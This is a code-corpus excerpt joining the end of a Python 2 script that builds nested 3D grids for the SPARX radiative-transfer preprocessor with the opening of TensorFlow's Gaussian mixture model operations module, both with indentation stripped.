Zb=np.zeros((nj,ni),np.float64)
for j in range(3,nj-2):
for i in range(3,ni-3):
Xb[j,i]=rb[i]*sin(thetab[j])
Zb[j,i]=rb[i]*cos(thetab[j])
# compute density gradient
grad_den=np.zeros((nj,ni),np.float64)
for j in xrange(3,nj-2):
for i in xrange(3,ni-3):
den_r=(density[j,i+1]-density[j,i-1])/(rb[i+1]-rb[i-1])
den_theta=(density[j+1,i]-density[j-1,i])/(rb[i]*(thetab[j+1]-thetab[j-1]))
grad_den[j,i]=sqrt(den_r*den_r+den_theta*den_theta)
#print grad_den[j,i]
# write original 2D VTK file
if (writegrid):
fmb=open('2D.vtk', mode = "w")
print >>fmb,'# vtk DataFile Version 3.0'
print >>fmb,'2DHydro'
print >>fmb,'ASCII'
print >>fmb,'DATASET STRUCTURED_GRID'
print >>fmb,'DIMENSIONS %(0)5d %(1)5d %(2)5d'%{'0':nj-5,'1':ni-5,'2':1}
print >>fmb,'POINTS %(0)8d float'%{'0':(ni-5)*(nj-5)}
for i in range(3,ni-2):
for j in range(3,nj-2):
print >>fmb,'%(0)11.4e %(1)1d %(2)11.4e'%{'0':ra[i]*sin(thetaa[j])*pc_cm,'1':0,'2':ra[i]*cos(thetaa[j])*pc_cm}
print >>fmb,'CELL_DATA %(0)8d'%{'0':(ni-6)*(nj-6)}
print >>fmb,'SCALARS density float 1'
print >>fmb,'LOOKUP_TABLE default'
for i in range(3,ni-3):
for j in range(3,nj-3):
print >>fmb,'%(0)11.4e'%{'0':density[j,i]}
fmb.close()
# Define a user record to characterize some kind of particles
class Particle(IsDescription):
LEVEL=Int32Col(pos=0)
POS=Int64Col(pos=1)
geom=StringCol(itemsize=6,pos=2)
X_max=Float64Col(shape=3,pos=3)
X_min=Float64Col(shape=3,pos=4)
X_cen=Float64Col(shape=3,pos=5)
n_H2=Float64Col(pos=6)
T_k=Float64Col(pos=7)
X_mol=Float64Col(pos=8)
X_pH2=Float64Col(pos=9)
X_oH2=Float64Col(pos=10)
X_e=Float64Col(pos=11)
X_H=Float64Col(pos=12)
X_He=Float64Col(pos=13)
V_t=Float64Col(pos=14)
V_edge=FloatCol(shape=(6,3),pos=15)
V_cen=FloatCol(shape=3,pos=16)
ds=FloatCol(pos=17)
NCHILDREN=Int64Col(pos=18)
NAXES=Int64Col(shape=3,pos=19)
T_d=Float64Col(pos=20)
kapp_d=StringCol(itemsize=64,pos=21)
T_ff=Float64Col(pos=22)
kapp_ff=StringCol(itemsize=64,pos=23)
T_bb=Float64Col(pos=24)
def main(pfile,direc,xaxis,yaxis,zaxis,n1,n2,level,position,pf2,npart,nzone):
# Create ZONE table
table = pfile.createTable(direc, 'ZONE', Particle, "Grid table")
particle = table.row
particle['LEVEL'] = level-1
particle['POS'] = position
particle['geom'] = geom
particle['X_max'] =[ xaxis[n1[0]]*pc_cm,yaxis[n1[1]]*pc_cm,zaxis[n1[2]]*pc_cm ]
particle['X_min'] =[ xaxis[0]*pc_cm,yaxis[0]*pc_cm,zaxis[0]*pc_cm ]
particle['X_cen'] =[ 0.5*(particle['X_max'][0]+particle['X_min'][0]),0.5*(particle['X_max'][1]+particle['X_min'][1]),0.5*(particle['X_max'][2]+particle['X_min'][2])]
particle['NCHILDREN'] =n1[0]*n1[1]*n1[2]
particle['NAXES'] =n1
#Insert a new particle record
particle.append()
table.flush()
del table.attrs.FIELD_0_FILL
del table.attrs.FIELD_1_FILL
del table.attrs.FIELD_2_FILL
del table.attrs.FIELD_3_FILL
del table.attrs.FIELD_4_FILL
del table.attrs.FIELD_5_FILL
del table.attrs.FIELD_6_FILL
del table.attrs.FIELD_7_FILL
del table.attrs.FIELD_8_FILL
del table.attrs.FIELD_9_FILL
del table.attrs.FIELD_10_FILL
del table.attrs.FIELD_11_FILL
del table.attrs.FIELD_12_FILL
del table.attrs.FIELD_13_FILL
del table.attrs.FIELD_14_FILL
del table.attrs.FIELD_15_FILL
del table.attrs.FIELD_16_FILL
del table.attrs.FIELD_17_FILL
del table.attrs.FIELD_18_FILL
del table.attrs.FIELD_19_FILL
del table.attrs.FIELD_20_FILL
del table.attrs.FIELD_21_FILL
del table.attrs.FIELD_22_FILL
del table.attrs.FIELD_23_FILL
del table.attrs.FIELD_24_FILL
del table.attrs.NROWS
cen_x=np.zeros(n1[0],np.float64)
cen_y=np.zeros(n1[1],np.float64)
cen_z=np.zeros(n1[2],np.float64)
rho=np.zeros(n1,np.float64)
Vx=np.zeros(n1,np.float64)
Vy=np.zeros(n1,np.float64)
Vz=np.zeros(n1,np.float64)
for i in range(n1[0]):
cen_x[i]=0.5*(xaxis[i]+xaxis[i+1])
for j in range(n1[1]):
cen_y[j]=0.5*(yaxis[j]+yaxis[j+1])
for k in range(n1[2]):
cen_z[k]=0.5*(zaxis[k]+zaxis[k+1])
# Create GRID table
table = pfile.createTable(direc, 'GRID', Particle, "Grid table")
particle = table.row
for i in range(n1[0]):
for j in range(n1[1]):
for k in range(n1[2]):
# write a row of grid table
particle['LEVEL'] = level
particle['POS'] = n1[1]*n1[2]*i+n1[2]*j+k
particle['geom'] = geom
particle['X_max'] =[ xaxis[i+1]*pc_cm,yaxis[j+1]*pc_cm,zaxis[k+1]*pc_cm]
particle['X_min'] =[ xaxis[i]*pc_cm,yaxis[j]*pc_cm,zaxis[k]*pc_cm]
particle['X_cen'] =[ cen_x[i]*pc_cm,cen_y[j]*pc_cm,cen_z[k]*pc_cm]
# project the cuboid zone to the R-theta plane
abs_minx=min(abs(xaxis[i]),abs(xaxis[i+1]))
abs_maxx=max(abs(xaxis[i]),abs(xaxis[i+1]))
abs_miny=min(abs(yaxis[j]),abs(yaxis[j+1]))
abs_maxy=max(abs(yaxis[j]),abs(yaxis[j+1]))
minX=sqrt( abs_minx*abs_minx+abs_miny*abs_miny)
maxX=sqrt( abs_maxx*abs_maxx+abs_maxy*abs_maxy)
minZ=zaxis[k]
maxZ=zaxis[k+1]
abs_minz=min(abs(minZ),abs(maxZ))
abs_maxz=max(abs(minZ),abs(maxZ))
minR=sqrt( minX*minX+abs_minz*abs_minz)
maxR=sqrt( maxX*maxX+abs_maxz*abs_maxz)
if (maxZ>0.0):
minTheta=atan(minX/maxZ)
elif (maxZ<0.0):
minTheta=atan(maxX/maxZ)+pi
else:
minTheta=0.5*pi
if (minZ>0.0):
maxTheta=atan(maxX/minZ)
elif (minZ<0.0):
maxTheta=atan(minX/minZ)+pi
else:
maxTheta=0.5*pi
# narrow down the searching domain
for tempi in xrange(3,ni-3):
if (rb[tempi]>minR):
break
i1=tempi
for tempi in xrange(i1,ni-3):
if (rb[tempi]>maxR):
break
i2=tempi
for tempj in xrange(3,nj-2):
if (thetab[tempj]>minTheta):
break
j1=tempj
for tempj in xrange(j1,nj-2):
if (thetab[tempj]>maxTheta):
break
j2=tempj
# search for maximum density gradient
max_grad=1E-100
for tempj in range(j1,j2):
for tempi in range(i1,i2):
if ( (minX<=Xb[tempj,tempi]<maxX) and (minZ<=Zb[tempj,tempi]<maxZ) ):
if ( max_grad<grad_den[tempj,tempi] ):
max_grad=grad_den[tempj,tempi]
# divide higher level
if ( ((log(max_grad)/log(2)-level)>Critical_value or minR<R_out<maxR) and level<Max_level ):
particle['NCHILDREN'] =n2[0]*n2[1]*n2[2]
particle['NAXES'] =n2
gdir='grid'+'%(0)d'%{'0':n1[1]*n1[2]*i+n1[2]*j+k}
group = pfile.createGroup(direc,gdir,gdir)
if (direc=="/"):
path=direc+gdir
else:
path=direc+"/"+gdir
h5file.delNodeAttr(path, "TITLE", name=None)
h5file.delNodeAttr(path, "CLASS", name=None)
h5file.delNodeAttr(path, "VERSION", name=None)
h5file.setNodeAttr(path, "molec", molec, name=None)
h5file.setNodeAttr(path, "T_cmb", T_cmb, name=None)
h5file.setNodeAttr(path, "gas_to_dust", gas_to_dust, name=None)
h5file.setNodeAttr(path, "velfield", "grid ", name=None)
dx2=(xaxis[i+1]-xaxis[i])/float(n2[0])
dy2=(yaxis[j+1]-yaxis[j])/float(n2[1])
dz2=(zaxis[k+1]-zaxis[k])/float(n2[2])
x2=np.zeros(n2[0]+1,np.float64)
y2=np.zeros(n2[1]+1,np.float64)
z2=np.zeros(n2[2]+1,np.float64)
for tempi in range(n2[0]+1):
x2[tempi]=xaxis[i]+float(tempi)*dx2
for tempj in range(n2[1]+1):
y2[tempj]=yaxis[j]+float(tempj)*dy2
for tempk in range(n2[2]+1):
z2[tempk]=zaxis[k]+float(tempk)*dz2
#if (current_level<level+1):
# current_level=level+1
# print 'current level=',current_level
# recursive create the nested grid
(npart,nzone)=main(pfile,path,x2,y2,z2,n2,nref,level+1,particle['POS'],pf2,npart,nzone)
# the leaf zone
else:
tempR=sqrt(cen_x[i]*cen_x[i]+cen_y[j]*cen_y[j]+cen_z[k]*cen_z[k])
if (tempR<=R_out): # inside the boundary/ non-empty
if (cen_z[k]==0.):
tempTheta=0.5*pi
else:
tempTheta=atan( sqrt(cen_x[i]*cen_x[i]+cen_y[j]*cen_y[j]) / cen_z[k] )
if (tempTheta<0):
tempTheta=tempTheta+pi
if (cen_x[i]==0.):
if(cen_y[j]>0):
tempPhi=0.5*pi
else:
tempPhi=-0.5*pi
else:
tempPhi=atan(cen_y[j]/cen_x[i])
if (x[i]<0):
tempPhi=tempPhi+pi
elif (tempPhi<0):
tempPhi=tempPhi+2*pi
if (tempR<R_in):
print 'Mesh inside the boundary!'
elif (tempR>R_out):
print 'Mesh outside the boundary!'
# interpolation
for tempai in xrange(3,ni-2):
if (ra[tempai]>tempR):
break
for tempaj in xrange(3,nj-2):
if (thetaa[tempaj]>tempTheta):
break
for tempbi in xrange(3,ni-3):
if (rb[tempbi]>tempR):
break
for tempbj in xrange(3,nj-2):
if (thetab[tempbj]>tempTheta):
break
alpha=(tempR-rb[tempbi-1])/(rb[tempbi]-rb[tempbi-1])
beta=(tempTheta-thetab[tempbj-1])/(thetab[tempbj]-thetab[tempbj-1])
rho[i,j,k]=(1.-alpha)*(1.-beta)*density[tempbj-1,tempbi-1]+alpha*(1.-beta)*density[tempbj-1,tempbi]+\
beta*(1.-alpha)*density[tempbj,tempbi-1]+alpha*beta*density[tempbj,tempbi]
tempVp=(1.-alpha)*(1.-beta)*Vp[tempbj-1,tempbi-1]+alpha*(1.-beta)*Vp[tempbj-1,tempbi]+\
beta*(1.-alpha)*Vp[tempbj,tempbi-1]+alpha*beta*Vp[tempbj,tempbi]
alpha=(tempR-ra[tempai-1])/(ra[tempai]-ra[tempai-1])
tempVr=(1.-alpha)*(1.-beta)*Vr[tempbj-1,tempai-1]+alpha*(1.-beta)*Vr[tempbj-1,tempai]+\
beta*(1.-alpha)*Vr[tempbj,tempai-1]+alpha*beta*Vr[tempbj,tempai]
alpha=(tempR-rb[tempbi-1])/(rb[tempbi]-rb[tempbi-1])
beta=(tempTheta-thetab[tempaj-1])/(thetab[tempaj]-thetab[tempaj-1])
tempVt=(1.-alpha)*(1.-beta)*Vt[tempaj-1,tempbi-1]+alpha*(1.-beta)*Vt[tempaj-1,tempbi]+\
beta*(1.-alpha)*Vt[tempaj,tempbi-1]+alpha*beta*Vt[tempaj,tempbi]
Vx[i,j,k]=sin(tempTheta)*cos(tempPhi)*tempVr+cos(tempTheta)*cos(tempPhi)*tempVt-sin(tempPhi)*tempVp
Vy[i,j,k]=sin(tempTheta)*sin(tempPhi)*tempVr+cos(tempTheta)*sin(tempPhi)*tempVt+cos(tempPhi)*tempVp
Vz[i,j,k]=cos(tempTheta)*tempVr-sin(tempTheta)*tempVt
# write out the non-empty-leaf zone
particle['n_H2'] =rho[i,j,k]*Nn_gcm
particle['V_cen'] =[Vx[i,j,k]*m_cm,Vy[i,j,k]*m_cm,Vz[i,j,k]*m_cm]
particle['T_k'] =T_k
particle['X_mol'] =X_mol
particle['V_t'] =V_t
nzone=nzone+1
# Insert a new particle record
particle.append()
if (level==0):
print n1[1]*n1[2]*i+n1[2]*j+k,'/',n1[0]*n1[1]*n1[2]
table.flush()
del table.attrs.FIELD_0_FILL
del table.attrs.FIELD_1_FILL
del table.attrs.FIELD_2_FILL
del table.attrs.FIELD_3_FILL
del table.attrs.FIELD_4_FILL
del table.attrs.FIELD_5_FILL
del table.attrs.FIELD_6_FILL
del table.attrs.FIELD_7_FILL
del table.attrs.FIELD_8_FILL
del table.attrs.FIELD_9_FILL
del table.attrs.FIELD_10_FILL
del table.attrs.FIELD_11_FILL
del table.attrs.FIELD_12_FILL
del table.attrs.FIELD_13_FILL
del table.attrs.FIELD_14_FILL
del table.attrs.FIELD_15_FILL
del table.attrs.FIELD_16_FILL
del table.attrs.FIELD_17_FILL
del table.attrs.FIELD_18_FILL
del table.attrs.FIELD_19_FILL
del table.attrs.FIELD_20_FILL
del table.attrs.FIELD_21_FILL
del table.attrs.FIELD_22_FILL
del table.attrs.FIELD_23_FILL
del table.attrs.FIELD_24_FILL
del table.attrs.NROWS
# Write Grid for visualization
if (writegrid):
fname='multiblock/post_'+str(npart)+'.vtr'
f=open(fname,'w')
# write in VTR format
print >>f,'<?xml version="1.0"?>'
print >>f,'<VTKFile type="RectilinearGrid" version="0.1" byte_order="LittleEndian">'
print >>f,' <RectilinearGrid WholeExtent="%(0)d %(1)d %(2)d %(3)d %(4)d %(5)d">'\
%{'0':0,'1':n1[0],'2':0,'3':n1[1],'4':0,'5':n1[2]}
print >>f,' <Piece Extent="%(0)d %(1)d %(2)d %(3)d %(4)d %(5)d">'\
%{'0':0,'1':n1[0],'2':0,'3':n1[1],'4':0,'5':n1[2]}
print >>f,' <Coordinates> '
print >>f,' <DataArray type="Float32" Name="X_COORDINATES" NumberOfComponents="1">'
for i in range(n1[0]+1):
print >>f,'%(0)12.6e'%{'0':xaxis[i]*pc_cm},
print >>f,'\n </DataArray>'
print >>f,' <DataArray type="Float32" Name="Y_COORDINATES" NumberOfComponents="1">'
for j in range(n1[1]+1):
print >>f,'%(0)12.6e'%{'0':yaxis[j]*pc_cm},
print >>f,'\n </DataArray>'
print >>f,' <DataArray type="Float32" Name="Z_COORDINATES" NumberOfComponents="1">'
for k in range(n1[2]+1):
print >>f,'%(0)12.6e'%{'0':zaxis[k]*pc_cm},
print >>f,'\n </DataArray>'
print >>f,' </Coordinates>'
print >>f,' </Piece>'
print >>f,' </RectilinearGrid>'
print >>f,'</VTKFile>'
f.close()
print >>fmb,' <DataSet group="%(0)d" dataset="0" file="%(1)s"/>'%{'0':npart,'1':fname}
return npart+1,nzone
# Timer
import time
tStart = time.time()
# Open a file in "w"rite mode
if (writegrid):
fmb=open('multiblock.pvd', mode = "w")
print >>fmb,'<?xml version="1.0"?>'
print >>fmb,'<VTKFile type="Collection" version="0.1" byte_order="LittleEndian" compressor="vtkZLibDataCompressor">'
print >>fmb,' <Collection>'
filename = "model"
h5file = openFile(filename, mode = "w", title = "Test file")
h5file.delNodeAttr("/", "TITLE", name=None)
h5file.delNodeAttr("/", "CLASS", name=None)
h5file.delNodeAttr("/", "VERSION", name=None)
h5file.delNodeAttr("/", "PYTABLES_FORMAT_VERSION", name=None)
h5file.setNodeAttr("/", "molec", molec, name=None)
h5file.setNodeAttr("/", "T_cmb", T_cmb, name=None)
h5file.setNodeAttr("/", "gas_to_dust", gas_to_dust, name=None)
h5file.setNodeAttr("/", "velfield", "grid ", name=None)
naxe=[mi,mj,mk]
zone=0
(part,zone)=main(h5file,root,x,y,z,naxe,nref,0,0,fmb,0,zone)
# Close (and flush) the file
h5file.close()
if (writegrid):
print >>fmb,' </Collection>'
print >>fmb,'</VTKFile>'
fmb.close()
tEnd = time.time()
# print out meta information
total_time=tEnd-tStart
hh=int(total_time/60/60)
mm=int(total_time/60%60)
ss=int(total_time%60)
print 'Elapsing time = %(0)d h %(1)d m %(2)d s'%{'0':hh,'1':mm,'2':ss}
print 'max radius=',Lx*0.5*sqrt(3)
print 'original radius=',R_out
print zone,'zones'
|
itahsieh/sparx-alpha
|
preprocessor/script/nested3D_ZEUS.py
|
Python
|
gpl-3.0
| 21,387
|
[
"VTK"
] |
bfbff6ded0f0df0c6e20e61d6de0e056ee7719dd46662822f4c25ec3376cc8ac
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Gaussian mixture models Operations."""
# TODO(xavigonzalvo): Factor out covariance matrix operations to make
# code reusable for different types (e.g. diag).
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from six.moves import xrange # pylint: disable=redefined-builtin
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import check_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import linalg_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import random_ops
from tensorflow.python.ops import state_ops
from tensorflow.python.ops import variable_scope
from tensorflow.python.ops import variables
from tensorflow.python.ops.embedding_ops import embedding_lookup
from tensorflow.python.summary import summary
# Machine epsilon.
MEPS = np.finfo(float).eps
FULL_COVARIANCE = 'full'
DIAG_COVARIANCE = 'diag'
def _covariance(x, diag):
"""Defines the covariance operation of a matrix.
Args:
x: a matrix Tensor. Dimension 0 should contain the number of examples.
diag: if True, it computes the diagonal covariance.
Returns:
A Tensor representing the covariance of x. In the case of
diagonal matrix just the diagonal is returned.
"""
num_points = math_ops.to_float(array_ops.shape(x)[0])
x -= math_ops.reduce_mean(x, 0, keep_dims=True)
if diag:
cov = math_ops.reduce_sum(
math_ops.square(x), 0, keep_dims=True) / (num_points - 1)
else:
cov = math_ops.matmul(x, x, transpose_a=True) / (num_points - 1)
return cov
def _init_clusters_random(data, num_clusters, random_seed):
"""Does random initialization of clusters.
Args:
data: a list of Tensors with a matrix of data, each row is an example.
num_clusters: an integer with the number of clusters.
random_seed: Seed for PRNG used to initialize seeds.
Returns:
A Tensor with num_clusters random rows of data.
"""
assert isinstance(data, list)
num_data = math_ops.add_n([array_ops.shape(inp)[0] for inp in data])
with ops.control_dependencies(
[check_ops.assert_less_equal(num_clusters, num_data)]):
indices = random_ops.random_uniform(
[num_clusters],
minval=0,
maxval=math_ops.cast(num_data, dtypes.int64),
seed=random_seed,
dtype=dtypes.int64)
indices %= math_ops.cast(num_data, dtypes.int64)
clusters_init = embedding_lookup(data, indices, partition_strategy='div')
return clusters_init
class GmmAlgorithm(object):
"""Tensorflow Gaussian mixture model clustering class."""
CLUSTERS_WEIGHT = 'alphas'
CLUSTERS_VARIABLE = 'clusters'
CLUSTERS_COVS_VARIABLE = 'clusters_covs'
def __init__(self,
data,
num_classes,
initial_means=None,
params='wmc',
covariance_type=FULL_COVARIANCE,
random_seed=0):
"""Constructor.
Args:
data: a list of Tensors with data, each row is a new example.
num_classes: number of clusters.
initial_means: a Tensor with a matrix of means. If None, means are
computed by sampling randomly.
params: Controls which parameters are updated in the training
process. Can contain any combination of "w" for weights, "m" for
means, and "c" for covariances.
covariance_type: one of "full", "diag".
random_seed: Seed for PRNG used to initialize seeds.
Raises:
Exception if covariance type is unknown.
"""
self._params = params
self._random_seed = random_seed
self._covariance_type = covariance_type
if self._covariance_type not in [DIAG_COVARIANCE, FULL_COVARIANCE]:
raise Exception( # pylint: disable=g-doc-exception
'programmer error: Invalid covariance type: %s' %
self._covariance_type)
# Create sharded variables for multiple shards. The following
# lists are indexed by shard.
# Probability per example in a class.
num_shards = len(data)
self._probs = [None] * num_shards
# Prior probability.
self._prior_probs = [None] * num_shards
# Membership weights w_{ik} where "i" is the i-th example and "k"
# is the k-th mixture.
self._w = [None] * num_shards
# Number of examples in a class.
self._points_in_k = [None] * num_shards
first_shard = data[0]
self._dimensions = array_ops.shape(first_shard)[1]
self._num_classes = num_classes
# Small value to guarantee that covariances are invertible.
self._min_var = array_ops.diag(
array_ops.ones(array_ops.stack([self._dimensions]))) * 1e-3
self._create_variables()
self._initialize_variables(data, initial_means)
# Operations of partial statistics for the computation of the means.
self._w_mul_x = []
# Operations of partial statistics for the computation of the covariances.
self._w_mul_x2 = []
self._define_graph(data)
def _create_variables(self):
"""Initializes GMM algorithm."""
init_value = array_ops.constant([], dtype=dtypes.float32)
self._means = variables.Variable(init_value,
name=self.CLUSTERS_VARIABLE,
validate_shape=False)
self._covs = variables.Variable(
init_value, name=self.CLUSTERS_COVS_VARIABLE, validate_shape=False)
# Mixture weights, representing the probability that a randomly
# selected unobservable data (in EM terms) was generated by component k.
self._alpha = variable_scope.variable(
array_ops.tile([1.0 / self._num_classes], [self._num_classes]),
name=self.CLUSTERS_WEIGHT,
validate_shape=False)
self._cluster_centers_initialized = variables.Variable(False,
dtype=dtypes.bool,
name='initialized')
def _initialize_variables(self, data, initial_means=None):
"""Initializes variables.
Args:
data: a list of Tensors with data, each row is a new example.
initial_means: a Tensor with a matrix of means.
"""
first_shard = data[0]
# Initialize means: num_classes X 1 X dimensions.
if initial_means is not None:
means = array_ops.expand_dims(initial_means, 1)
else:
# Sample data randomly
means = array_ops.expand_dims(
_init_clusters_random(data, self._num_classes, self._random_seed), 1)
# Initialize covariances.
if self._covariance_type == FULL_COVARIANCE:
cov = _covariance(first_shard, False) + self._min_var
# A matrix per class, num_classes X dimensions X dimensions
covs = array_ops.tile(
array_ops.expand_dims(cov, 0), [self._num_classes, 1, 1])
elif self._covariance_type == DIAG_COVARIANCE:
cov = _covariance(first_shard, True) + self._min_var
# A diagonal per row, num_classes X dimensions.
covs = array_ops.tile(
array_ops.expand_dims(array_ops.diag_part(cov), 0),
[self._num_classes, 1])
with ops.colocate_with(self._cluster_centers_initialized):
initialized = control_flow_ops.with_dependencies(
[means, covs],
array_ops.identity(self._cluster_centers_initialized))
self._init_ops = []
with ops.colocate_with(self._means):
init_means = state_ops.assign(self._means, means, validate_shape=False)
init_means = control_flow_ops.with_dependencies(
[init_means],
state_ops.assign(self._cluster_centers_initialized, True))
self._init_ops.append(control_flow_ops.cond(initialized,
control_flow_ops.no_op,
lambda: init_means).op)
with ops.colocate_with(self._covs):
init_covs = state_ops.assign(self._covs, covs, validate_shape=False)
init_covs = control_flow_ops.with_dependencies(
[init_covs],
state_ops.assign(self._cluster_centers_initialized, True))
self._init_ops.append(control_flow_ops.cond(initialized,
control_flow_ops.no_op,
lambda: init_covs).op)
def init_ops(self):
"""Returns the initialization operation."""
return control_flow_ops.group(*self._init_ops)
def training_ops(self):
"""Returns the training operation."""
return control_flow_ops.group(*self._train_ops)
def is_initialized(self):
"""Returns a boolean operation for initialized variables."""
return self._cluster_centers_initialized
def alphas(self):
return self._alpha
def clusters(self):
"""Returns the clusters with dimensions num_classes X 1 X num_dimensions."""
return self._means
def covariances(self):
"""Returns the covariances matrices."""
return self._covs
def assignments(self):
"""Returns a list of Tensors with the matrix of assignments per shard."""
ret = []
for w in self._w:
ret.append(math_ops.argmax(w, 1))
return ret
def scores(self):
"""Returns the distances to each class.
Returns:
A tuple with two Tensors. The first contains the distance to
each class. The second contains the distance to the assigned
class.
"""
return (self._all_scores, self._scores)
def _define_graph(self, data):
"""Define graph for a single iteration.
Args:
data: a list of Tensors defining the training data.
"""
for shard_id, shard in enumerate(data):
self._num_examples = array_ops.shape(shard)[0]
shard = array_ops.expand_dims(shard, 0)
self._define_log_prob_operation(shard_id, shard)
self._define_prior_log_prob_operation(shard_id)
self._define_expectation_operation(shard_id)
self._define_partial_maximization_operation(shard_id, shard)
self._define_maximization_operation(len(data))
self._define_distance_to_clusters(data)
def _define_full_covariance_probs(self, shard_id, shard):
"""Defines the full covariance probabilties per example in a class.
Updates a matrix with dimension num_examples X num_classes.
Args:
shard_id: id of the current shard.
shard: current data shard, 1 X num_examples X dimensions.
"""
diff = shard - self._means
cholesky = linalg_ops.cholesky(self._covs + self._min_var)
log_det_covs = 2.0 * math_ops.reduce_sum(
math_ops.log(array_ops.matrix_diag_part(cholesky)), 1)
x_mu_cov = math_ops.square(
linalg_ops.matrix_triangular_solve(
cholesky, array_ops.transpose(
diff, perm=[0, 2, 1]), lower=True))
diag_m = array_ops.transpose(math_ops.reduce_sum(x_mu_cov, 1))
self._probs[shard_id] = -0.5 * (diag_m + math_ops.to_float(self._dimensions)
* math_ops.log(2 * np.pi) + log_det_covs)
def _define_diag_covariance_probs(self, shard_id, shard):
"""Defines the diagonal covariance probabilities per example in a class.
Args:
shard_id: id of the current shard.
shard: current data shard, 1 X num_examples X dimensions.
Returns a matrix num_examples * num_classes.
"""
# num_classes X 1
# TODO(xavigonzalvo): look into alternatives to log for
# reparametrization of variance parameters.
det_expanded = math_ops.reduce_sum(
math_ops.log(self._covs + 1e-3), 1, keep_dims=True)
diff = shard - self._means
x2 = math_ops.square(diff)
cov_expanded = array_ops.expand_dims(1.0 / (self._covs + 1e-3), 2)
# num_classes X num_examples
x2_cov = math_ops.matmul(x2, cov_expanded)
x2_cov = array_ops.transpose(array_ops.squeeze(x2_cov, [2]))
self._probs[shard_id] = -0.5 * (
math_ops.to_float(self._dimensions) * math_ops.log(2.0 * np.pi) +
array_ops.transpose(det_expanded) + x2_cov)
def _define_log_prob_operation(self, shard_id, shard):
"""Probability per example in a class.
Updates a matrix with dimension num_examples X num_classes.
Args:
shard_id: id of the current shard.
shard: current data shard, 1 X num_examples X dimensions.
"""
# TODO(xavigonzalvo): Use the pdf defined in
# third_party/tensorflow/contrib/distributions/python/ops/gaussian.py
if self._covariance_type == FULL_COVARIANCE:
self._define_full_covariance_probs(shard_id, shard)
elif self._covariance_type == DIAG_COVARIANCE:
self._define_diag_covariance_probs(shard_id, shard)
self._probs[shard_id] += math_ops.log(self._alpha)
def _define_prior_log_prob_operation(self, shard_id):
"""Computes the prior probability of all samples.
Updates a vector where each item is the prior probabibility of an
input example.
Args:
shard_id: id of current shard_id.
"""
self._prior_probs[shard_id] = math_ops.reduce_logsumexp(
self._probs[shard_id], axis=1, keep_dims=True)
def _define_expectation_operation(self, shard_id):
# Shape broadcasting.
probs = array_ops.expand_dims(self._probs[shard_id], 0)
# Membership weights are computed as:
# w_{ik} = \frac{\alpha_k f(\mathbf{y_i}|\mathbf{\theta}_k)}
# {\sum_{m=1}^{K}\alpha_mf(\mathbf{y_i}|\mathbf{\theta}_m)}
# where "i" is the i-th example, "k" is the k-th mixture, theta are
# the model parameters and y_i the observations.
# These are defined for each shard.
self._w[shard_id] = array_ops.reshape(
math_ops.exp(probs - self._prior_probs[shard_id]),
array_ops.stack([self._num_examples, self._num_classes]))
def _define_partial_maximization_operation(self, shard_id, shard):
"""Computes the partial statistics of the means and covariances.
Args:
shard_id: current shard id.
shard: current data shard, 1 X num_examples X dimensions.
"""
# Soft assignment of each data point to each of the two clusters.
self._points_in_k[shard_id] = math_ops.reduce_sum(
self._w[shard_id], 0, keep_dims=True)
# Partial means.
w_mul_x = array_ops.expand_dims(
math_ops.matmul(
self._w[shard_id], array_ops.squeeze(shard, [0]), transpose_a=True),
1)
self._w_mul_x.append(w_mul_x)
# Partial covariances.
x = array_ops.concat([shard for _ in range(self._num_classes)], 0)
x_trans = array_ops.transpose(x, perm=[0, 2, 1])
x_mul_w = array_ops.concat([
array_ops.expand_dims(x_trans[k, :, :] * self._w[shard_id][:, k], 0)
for k in range(self._num_classes)
], 0)
self._w_mul_x2.append(math_ops.matmul(x_mul_w, x))
def _define_maximization_operation(self, num_batches):
"""Maximization operations."""
# TODO(xavigonzalvo): some of these operations could be moved to C++.
# Compute the effective number of data points assigned to component k.
with ops.control_dependencies(self._w):
points_in_k = array_ops.squeeze(
math_ops.add_n(self._points_in_k), squeeze_dims=[0])
# Update alpha.
if 'w' in self._params:
final_points_in_k = points_in_k / num_batches
num_examples = math_ops.to_float(math_ops.reduce_sum(final_points_in_k))
self._alpha_op = self._alpha.assign(final_points_in_k /
(num_examples + MEPS))
else:
self._alpha_op = control_flow_ops.no_op()
self._train_ops = [self._alpha_op]
# Update means.
points_in_k_expanded = array_ops.reshape(points_in_k,
[self._num_classes, 1, 1])
if 'm' in self._params:
self._means_op = self._means.assign(
math_ops.div(
math_ops.add_n(self._w_mul_x), points_in_k_expanded + MEPS))
else:
self._means_op = control_flow_ops.no_op()
# means are (num_classes x 1 x dims)
# Update covariances.
with ops.control_dependencies([self._means_op]):
b = math_ops.add_n(self._w_mul_x2) / (points_in_k_expanded + MEPS)
new_covs = []
for k in range(self._num_classes):
mean = self._means.value()[k, :, :]
square_mean = math_ops.matmul(mean, mean, transpose_a=True)
new_cov = b[k, :, :] - square_mean + self._min_var
if self._covariance_type == FULL_COVARIANCE:
new_covs.append(array_ops.expand_dims(new_cov, 0))
elif self._covariance_type == DIAG_COVARIANCE:
new_covs.append(
array_ops.expand_dims(array_ops.diag_part(new_cov), 0))
new_covs = array_ops.concat(new_covs, 0)
if 'c' in self._params:
# Train operations don't need to take care of the means
# because covariances already depend on it.
with ops.control_dependencies([self._means_op, new_covs]):
self._train_ops.append(
state_ops.assign(
self._covs, new_covs, validate_shape=False))
def _define_distance_to_clusters(self, data):
"""Defines the Mahalanobis distance to the assigned Gaussian."""
# TODO(xavigonzalvo): reuse (input - mean) * cov^-1 * (input -
# mean) from log probability function.
self._all_scores = []
for shard in data:
all_scores = []
shard = array_ops.expand_dims(shard, 0)
for c in xrange(self._num_classes):
if self._covariance_type == FULL_COVARIANCE:
cov = self._covs[c, :, :]
elif self._covariance_type == DIAG_COVARIANCE:
cov = array_ops.diag(self._covs[c, :])
inverse = linalg_ops.matrix_inverse(cov + self._min_var)
